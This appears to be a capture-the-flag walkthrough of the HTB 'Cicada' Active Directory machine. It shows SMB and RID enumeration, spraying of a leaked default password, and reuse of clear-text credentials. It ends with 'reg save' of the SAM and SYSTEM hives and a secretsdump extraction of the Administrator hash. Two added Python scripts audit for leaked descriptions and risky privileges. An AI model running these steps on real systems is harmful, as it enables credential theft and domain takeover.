Cicada

Notes from my HTB boxes
~ $ nmap -A -Pn 10.129.231.149
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-17 09:46 +0100
Nmap scan report for 10.129.231.149
Host is up (0.023s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-17 15:47:03Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-17T15:48:23+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-17T15:48:23+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-17T15:48:23+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-17T15:48:23+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2026-02-17T15:47:45
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.72 seconds

The SMB port is open, so I try to enumerate the shares with anonymous authentication to see whether any permissions have been misconfigured.

~ $ smbclient -L cicada.htb -U anonymous  
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\anonymous]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	DEV             Disk      
	HR              Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

HR (Human Resources) looks like an interesting target for finding sensitive documents.

smbclient //10.129.231.149/HR -N
smb: \> ls
  .                                   D        0  Thu Mar 14 13:29:09 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 19:31:48 2024
smb: \> get "Notice from HR.txt"

The document contains the default password.

~/Documents/Ctf/Htb/en_cours $ cat Notice\ from\ HR.txt 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp
Cicada$M6Corpb*@Lp#nZp!8

To test this password, I first need a list of valid domain users, which I build by brute-forcing RIDs.

~ $ nxc smb 10.129.231.149 -u 'anonymous' -p '' --rid-brute    
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\anonymous: (Guest)
SMB         10.129.231.149  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

Someone has necessarily left their default password in place, so I try the password I found against every user until one of them works.

~/Documents/Ctf/Htb/en_cours $ nxc smb 10.129.231.149 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' users
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 

I list all the LDAP directory objects visible to this user, michael.wrightson.

~/Documents/Ctf/Htb/en_cours $ nxc ldap 10.129.231.149 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users --groups --computers
LDAP        10.129.231.149  389    CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) (signing:None) (channel binding:Never) 
LDAP        10.129.231.149  389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.129.231.149  389    CICADA-DC        [*] Enumerated 8 domain users: cicada.htb
LDAP        10.129.231.149  389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        10.129.231.149  389    CICADA-DC        Administrator                 2024-08-26 22:08:03 0        Built-in account for administering the computer/domain      
LDAP        10.129.231.149  389    CICADA-DC        Guest                         2024-08-28 19:26:56 0        Built-in account for guest access to the computer/domain    
LDAP        10.129.231.149  389    CICADA-DC        krbtgt                        2024-03-14 12:14:10 0        Key Distribution Center Service Account                     
LDAP        10.129.231.149  389    CICADA-DC        john.smoulder                 2024-03-14 13:17:29 2                                                                    
LDAP        10.129.231.149  389    CICADA-DC        sarah.dantelia                2024-03-14 13:17:29 2                                                                    
LDAP        10.129.231.149  389    CICADA-DC        michael.wrightson             2024-03-14 13:17:29 0                                                                    
LDAP        10.129.231.149  389    CICADA-DC        david.orelious                2024-03-14 13:17:29 2        Just in case I forget my password is aRt$Lp#7t*VQ!3         
LDAP        10.129.231.149  389    CICADA-DC        emily.oscars                  2024-08-22 23:20:17 2                                                                    
LDAP        10.129.231.149  389    CICADA-DC        -Group-                                  -Members- -Description-                                               
LDAP        10.129.231.149  389    CICADA-DC        Administrators                           3         Administrators have complete and unrestricted access to the computer/domain
LDAP        10.129.231.149  389    CICADA-DC        Users                                    3         Users are prevented from making accidental or intentional system-wide changes and can run most applications
LDAP        10.129.231.149  389    CICADA-DC        Guests                                   2         Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted
LDAP        10.129.231.149  389    CICADA-DC        Print Operators                          0         Members can administer printers installed on domain controllers
LDAP        10.129.231.149  389    CICADA-DC        Backup Operators                         2         Backup Operators can override security restrictions for the sole purpose of backing up or restoring files
LDAP        10.129.231.149  389    CICADA-DC        Replicator                               0         Supports file replication in a domain
LDAP        10.129.231.149  389    CICADA-DC        Remote Desktop Users                     0         Members in this group are granted the right to logon remotely
LDAP        10.129.231.149  389    CICADA-DC        Network Configuration Operators          0         Members in this group can have some administrative privileges to manage configuration of networking features
LDAP        10.129.231.149  389    CICADA-DC        Performance Monitor Users                0         Members of this group can access performance counter data locally and remotely
LDAP        10.129.231.149  389    CICADA-DC        Performance Log Users                    0         Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer
LDAP        10.129.231.149  389    CICADA-DC        Distributed COM Users                    0         Members are allowed to launch, activate and use Distributed COM objects on this machine.
LDAP        10.129.231.149  389    CICADA-DC        IIS_IUSRS                                1         Built-in group used by Internet Information Services.
LDAP        10.129.231.149  389    CICADA-DC        Cryptographic Operators                  0         Members are authorized to perform cryptographic operations.
LDAP        10.129.231.149  389    CICADA-DC        Event Log Readers                        0         Members of this group can read event logs from local machine
LDAP        10.129.231.149  389    CICADA-DC        Certificate Service DCOM Access          1         Members of this group are allowed to connect to Certification Authorities in the enterprise
LDAP        10.129.231.149  389    CICADA-DC        RDS Remote Access Servers                0         Servers in this group enable users of RemoteApp programs and personal virtual desktops access to these resources. In Internet-facing deployments, these servers are typically deployed in an edge network. This group needs to be populated on servers running RD Connection Broker. RD Gateway servers and RD Web Access servers used in the deployment need to be in this group.
LDAP        10.129.231.149  389    CICADA-DC        RDS Endpoint Servers                     0         Servers in this group run virtual machines and host sessions where users RemoteApp programs and personal virtual desktops run. This group needs to be populated on servers running RD Connection Broker. RD Session Host servers and RD Virtualization Host servers used in the deployment need to be in this group.
LDAP        10.129.231.149  389    CICADA-DC        RDS Management Servers                   0         Servers in this group can perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central Management service must be included in this group.
LDAP        10.129.231.149  389    CICADA-DC        Hyper-V Administrators                   0         Members of this group have complete and unrestricted access to all features of Hyper-V.
LDAP        10.129.231.149  389    CICADA-DC        Access Control Assistance Operators      0         Members of this group can remotely query authorization attributes and permissions for resources on this computer.
LDAP        10.129.231.149  389    CICADA-DC        Remote Management Users                  1         Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
LDAP        10.129.231.149  389    CICADA-DC        Storage Replica Administrators           0         Members of this group have complete and unrestricted access to all features of Storage Replica.
LDAP        10.129.231.149  389    CICADA-DC        Domain Computers                         0         All workstations and servers joined to the domain
LDAP        10.129.231.149  389    CICADA-DC        Domain Controllers                       0         All domain controllers in the domain
LDAP        10.129.231.149  389    CICADA-DC        Schema Admins                            1         Designated administrators of the schema
LDAP        10.129.231.149  389    CICADA-DC        Enterprise Admins                        1         Designated administrators of the enterprise
LDAP        10.129.231.149  389    CICADA-DC        Cert Publishers                          0         Members of this group are permitted to publish certificates to the directory
LDAP        10.129.231.149  389    CICADA-DC        Domain Admins                            1         Designated administrators of the domain
LDAP        10.129.231.149  389    CICADA-DC        Domain Users                             0         All domain users
LDAP        10.129.231.149  389    CICADA-DC        Domain Guests                            0         All domain guests
LDAP        10.129.231.149  389    CICADA-DC        Group Policy Creator Owners              1         Members in this group can modify group policy for the domain
LDAP        10.129.231.149  389    CICADA-DC        RAS and IAS Servers                      0         Servers in this group can access remote access properties of users
LDAP        10.129.231.149  389    CICADA-DC        Server Operators                         0         Members can administer domain servers
LDAP        10.129.231.149  389    CICADA-DC        Account Operators                        0         Members can administer domain user and group accounts
LDAP        10.129.231.149  389    CICADA-DC        Pre-Windows 2000 Compatible Access       1         A backward compatibility group which allows read access on all users and groups in the domain
LDAP        10.129.231.149  389    CICADA-DC        Incoming Forest Trust Builders           0         Members of this group can create incoming, one-way trusts to this forest
LDAP        10.129.231.149  389    CICADA-DC        Windows Authorization Access Group       1         Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects
LDAP        10.129.231.149  389    CICADA-DC        Terminal Server License Servers          0         Members of this group can update user accounts in Active Directory with information about license issuance, for the purpose of tracking and reporting TS Per User CAL usage
LDAP        10.129.231.149  389    CICADA-DC        Allowed RODC Password Replication Group  0         Members in this group can have their passwords replicated to all read-only domain controllers in the domain
LDAP        10.129.231.149  389    CICADA-DC        Denied RODC Password Replication Group   8         Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
LDAP        10.129.231.149  389    CICADA-DC        Read-only Domain Controllers             0         Members of this group are Read-Only Domain Controllers in the domain
LDAP        10.129.231.149  389    CICADA-DC        Enterprise Read-only Domain Controllers  0         Members of this group are Read-Only Domain Controllers in the enterprise
LDAP        10.129.231.149  389    CICADA-DC        Cloneable Domain Controllers             0         Members of this group that are domain controllers may be cloned.
LDAP        10.129.231.149  389    CICADA-DC        Protected Users                          0         Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.
LDAP        10.129.231.149  389    CICADA-DC        Key Admins                               0         Members of this group can perform administrative actions on key objects within the domain.
LDAP        10.129.231.149  389    CICADA-DC        Enterprise Key Admins                    0         Members of this group can perform administrative actions on key objects within the forest.
LDAP        10.129.231.149  389    CICADA-DC        DnsAdmins                                0         DNS Administrators Group
LDAP        10.129.231.149  389    CICADA-DC        DnsUpdateProxy                           0         DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
LDAP        10.129.231.149  389    CICADA-DC        Groups                                   0         
LDAP        10.129.231.149  389    CICADA-DC        Dev Support                              0         
LDAP        10.129.231.149  389    CICADA-DC        [*] Total records returned: 1
LDAP        10.129.231.149  389    CICADA-DC        CICADA-DC$
~/Documents/Ctf/Htb/en_cours $ 
LDAP        10.129.231.149  389    CICADA-DC        david.orelious                2024-03-14 13:17:29 2        Just in case I forget my password is aRt$Lp#7t*VQ!3
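The two findings above, a user list recovered by RID brute force and a clear-text password stored in an account's description attribute, are both things a domain owner can check for from their own side: the description attribute is readable by every authenticated user, so anything written there is effectively public within the domain. The following is an added Python example, not part of the original notes and not an nxc feature: it parses the nxc output format shown above into structured records and flags any description that mentions a password or credential. The sample lines are copied from the output above, except the jane.doe line, which is constructed to show an account that is not flagged.

```python
import re

# Sample input: lines copied from the nxc --rid-brute and nxc ldap --users
# output above (trailing whitespace trimmed). The jane.doe line is constructed
# to show a description that must not be flagged.
RID_BRUTE_OUTPUT = r"""
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\anonymous: (Guest)
SMB         10.129.231.149  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
"""

LDAP_USERS_OUTPUT = r"""
LDAP        10.129.231.149  389    CICADA-DC        [*] Enumerated 8 domain users: cicada.htb
LDAP        10.129.231.149  389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW-  -Description-
LDAP        10.129.231.149  389    CICADA-DC        Administrator                 2024-08-26 22:08:03 0        Built-in account for administering the computer/domain
LDAP        10.129.231.149  389    CICADA-DC        john.smoulder                 2024-03-14 13:17:29 2
LDAP        10.129.231.149  389    CICADA-DC        david.orelious                2024-03-14 13:17:29 2        Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.129.231.149  389    CICADA-DC        jane.doe                      2024-03-14 13:17:29 0        Contractor, expires 2024-12-31
"""

# "<rid>: <DOMAIN>\<name> (SidTypeXxx)" as printed by --rid-brute.
RID_LINE = re.compile(
    r"(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+?) \((?P<kind>SidType\w+)\)\s*$"
)
# One row of the --users table: tool columns, username, "last PW set", bad-PW count, free text.
LDAP_USER_LINE = re.compile(
    r"^LDAP\s+\S+\s+\d+\s+\S+\s+(?P<user>\S+)\s+"
    r"(?P<pwset>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+(?P<badpw>\d+)\s*(?P<desc>.*?)\s*$"
)
# Words that suggest a credential has been written into a free-text attribute.
SECRET_HINT = re.compile(r"(?i)\b(pass(word|wd)?|pwd|mdp|credentials?)\b")


def parse_rid_brute(text):
    """Return (rid, name, sid_type) tuples for every resolved SID in --rid-brute output."""
    found = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            found.append((int(m["rid"]), m["name"], m["kind"]))
    return found


def user_accounts(text):
    """Only the SidTypeUser entries: the account names a password audit would cover."""
    return [name for _, name, kind in parse_rid_brute(text) if kind == "SidTypeUser"]


def parse_ldap_users(text):
    """Turn the --users table into dicts; header and status lines are skipped."""
    users = []
    for line in text.splitlines():
        m = LDAP_USER_LINE.match(line)
        if m:
            users.append({
                "user": m["user"],
                "last_pw_set": m["pwset"],
                "bad_pw": int(m["badpw"]),
                "description": m["desc"],
            })
    return users


def flag_leaky_descriptions(users):
    """Accounts whose description looks like it carries a password or credential."""
    return [(u["user"], u["description"]) for u in users
            if SECRET_HINT.search(u["description"])]


if __name__ == "__main__":
    print("user accounts:", user_accounts(RID_BRUTE_OUTPUT))
    for user, desc in flag_leaky_descriptions(parse_ldap_users(LDAP_USERS_OUTPUT)):
        print(f"[!] {user}: description contains a credential hint: {desc!r}")
```

On the output above this reports david.orelious and nothing else. The same regex applied to the raw `description` attribute of every user object (for instance from an LDAP export) is a cheap recurring check; the remediation is to clear the attribute and reset that account's password, since the value has been readable by every domain user since it was written.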

david.orelious:aRt$Lp#7t*VQ!3. I use these credentials to move laterally and connect to the DEV share.

~/Documents/Ctf/Htb/en_cours $ smbclient //10.129.231.149/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
Can't load /etc/samba/smb.conf - run testparm to debug it
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:31:39 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 19:28:22 2024

		4168447 blocks of size 4096. 475475 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (6,8 KiloBytes/sec) (average 6,8 KiloBytes/sec)
smb: \> exit
~/Documents/Ctf/Htb/en_cours $ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

I perform yet another lateral move, this time to the target user:

emily.oscars:Q!3@Lp#M6b*7t*Vt

Reminder:

~/Documents/Ctf/Htb/en_cours $ nxc winrm 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM       10.129.231.149  5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) 
WINRM       10.129.231.149  5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
~/Documents/Ctf/Htb/en_cours $ evil-winrm -i 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

The session is validated and I grab the flag.

Root

I check my permissions.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

I hold SeBackupPrivilege, which is unusual for a regular user, so I look for a privilege escalation based on this privilege:

I can check with SharpUp.exe, a tool that looks for privilege escalation weaknesses; I upload it.


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> ./Sharpup.exe audit TokenPrivileges

=== SharpUp: Running Privilege Escalation Checks ===

=== Abusable Token Privileges ===
	SeBackupPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
	SeRestorePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED

[*] Completed Privesc Checks in 0 seconds

SeBackupPrivilege allows copying any file on the system, even one protected by ACLs, because it is designed for backup software.
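To make the SharpUp result reproducible without uploading a binary, here is an added Python example (not part of the original notes, and not SharpUp's code) that parses the GROUP and PRIVILEGES sections of `whoami /all` output, reports the privileges that bypass object ACLs, and ties each one back to the built-in group that grants it. The well-known SIDs and the default privilege assignments for Administrators, Backup Operators and Server Operators are standard Windows defaults; the sample text is the `whoami /all` output above, trimmed to the relevant rows.

```python
import re

# Sample input: the GROUP and PRIVILEGES sections of the `whoami /all` output
# above, trimmed to the rows that matter for the audit.
WHOAMI_ALL = r"""
GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

GROUP_LINE = re.compile(
    r"^(?P<name>\S.*?)\s{2,}(?P<kind>Well-known group|Alias|Label|Group)\s+(?P<sid>S-[\d-]+)"
)
PRIV_LINE = re.compile(r"^(?P<name>Se\w+Privilege)\s+.+?\s+(?P<state>Enabled|Disabled)\s*$")

# Privileges that bypass object ACLs, and why a defender cares. A "Disabled"
# state is not a mitigation: a process that holds a privilege can re-enable it.
SENSITIVE_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of its ACL (registry hives included)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate authenticated clients",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Built-in groups (well-known SIDs) whose membership grants privileges above
# under the default domain-controller policy.
GROUP_GRANTS = {
    "S-1-5-32-544": ("Administrators", set(SENSITIVE_PRIVILEGES)),
    "S-1-5-32-551": ("Backup Operators", {"SeBackupPrivilege", "SeRestorePrivilege"}),
    "S-1-5-32-549": ("Server Operators", {"SeBackupPrivilege", "SeRestorePrivilege"}),
}


def parse_whoami(text):
    """Return ({sid: group name}, {privilege: state}) from `whoami /all` text."""
    groups, privs = {}, {}
    for line in text.splitlines():
        g = GROUP_LINE.match(line)
        if g:
            groups[g["sid"]] = g["name"]
            continue
        p = PRIV_LINE.match(line)
        if p:
            privs[p["name"]] = p["state"]
    return groups, privs


def audit_token(text):
    """For each sensitive privilege held, report its state, its impact and the
    built-in group membership (if any) that explains it."""
    groups, privs = parse_whoami(text)
    findings = []
    for priv, why in SENSITIVE_PRIVILEGES.items():
        if priv not in privs:
            continue
        via = [name for sid, (name, granted) in GROUP_GRANTS.items()
               if sid in groups and priv in granted]
        findings.append({"privilege": priv, "state": privs[priv],
                         "impact": why, "granted_via": via})
    return findings


if __name__ == "__main__":
    for f in audit_token(WHOAMI_ALL):
        src = ", ".join(f["granted_via"]) or "direct assignment / unknown"
        print(f"[!] {f['privilege']} ({f['state']}): {f['impact']} [via {src}]")
```

Run on the output above this reports SeBackupPrivilege and SeRestorePrivilege, both explained by BUILTIN\Backup Operators (S-1-5-32-551). On a domain controller that group membership is the real finding to review: Backup Operators is as sensitive as an administrative group there, and an Enabled or Disabled state in the token changes nothing, since a held privilege can be re-enabled by the process at any time.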

I use this privilege to extract the SAM (Security Account Manager) and SYSTEM hives. These files contain the password hashes of the local accounts.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\sam C:\temp\sam.hive
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\system C:\temp\system.hive
The operation completed successfully.

I download the two files I just created, then extract the administrator's hash with secretsdump.py from the Impacket suite.

~/Documents/Ctf/Htb/en_cours $ secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
